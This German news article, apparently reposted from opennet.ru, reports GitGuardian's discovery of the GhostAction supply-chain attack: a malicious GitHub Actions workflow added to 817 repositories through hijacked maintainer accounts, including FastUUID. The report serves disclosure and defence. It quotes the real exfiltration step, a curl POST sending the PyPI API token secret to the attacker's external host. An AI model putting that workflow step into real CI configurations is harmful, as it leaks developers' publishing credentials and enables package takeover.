Im Laufe des GhostAction-Angriffs wurden 817 Repositories auf GitHub kompromittiert.

Forscher von GitGuardian haben einen massiven Angriff auf GitHub-Nutzer entdeckt, bei dem die Kontrolle über 327 Konten erlangt und ein bösartiger Handler für GitHub Actions in 817 Repositories eingebaut wurde. Dieser Angriff führte zur Offenlegung von 3325 Geheimnissen, die in Continuous Integration-Systemen verwendet und über Umgebungsvariablen übermittelt wurden, darunter Zugangstokens für PyPI, GitHub, NPM, DockerHub und verschiedene Cloud-Speicher.

Im Laufe des GhostAction-Angriffs wurden 817 Repositories auf GitHub kompromittiert.

GitHub Actions ermöglicht es Entwicklern, Handler für die Automatisierung verschiedener Operationen in GitHub anzuhängen. Zum Beispiel können mit GitHub Actions bestimmte Prüfungen und Tests bei Commits durchgeführt oder die Bearbeitung neuer Issues automatisiert werden. Der bösartige Handler verbreitete sich unter dem Namen „Github Actions Security“ und enthielt in den „run“-Abschnitten den Befehl „curl“, der den Inhalt von Umgebungsvariablen beim Ausführen von Aufgaben in einer Continuous Integration-Umgebung an einen externen Host sendete. Der bösartige Commit wurde über Konten von Projektverwaltern hinzugefügt, die wahrscheinlich zuvor gehackt oder Opfer von Phishing wurden.

Ein Angriff wurde nach der Analyse anormale Aktivitäten im Zusammenhang mit dem Paket FastUUID festgestellt, das eine Python-Schnittstelle für die Rust-Bibliothek UUID bereitstellt. Das FastUUID-Paket, das in der letzten Woche nahezu 1,2 Millionen Downloads verzeichnete, wird als Abhängigkeit in dem beliebten Projekt LiteLLM verwendet, das in PyPI mehr als 5 Millionen Downloads pro Woche hat. Eine Analyse der Änderungen im FastUUID-Repository zeigte, dass der Projektbetreuer am 2. September einen Commit mit einem neuen Github Action-Handler hinzugefügt hat, der den Code zur Übertragung des Tokens an das PyPI-Repository auf einen externen Host enthält. — name: Github Actions Security run: | curl -s -X POST -d ‘PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}’ https://bold-dhawan.45-139-104-115.plesk.page

Das Problem konnte erkannt werden, bevor die Angreifer den abgefangenen Token ausnutzen konnten – die Veröffentlichung von schädlichen Änderungen oder modifizierten Versionen des Pakets in PyPI für FastUUID wurde nicht festgestellt. Ähnliche Injektionen von GitHub Action wurden in 816 weiteren Repositories identifiziert, deren Besitzer sowie die Verwaltung von PyPI, GitHub, NPM und DockerHub benachrichtigt wurden. Stand gestern Abend waren schädliche Commits in etwa 100 Repositories rückgängig gemacht worden. Aktuell werden in GitHub 671 Commits mit schädlichem GitHub Action ermittelt.

Quelle: opennet.ru

Zuverlässiges Webhosting mit DDoS-Schutz, VPS- und VDS-Server kaufen 🔥 Zuverlässiges Webhosting mit DDoS-Schutz, VPS- und VDS-Server kaufen | ProHoster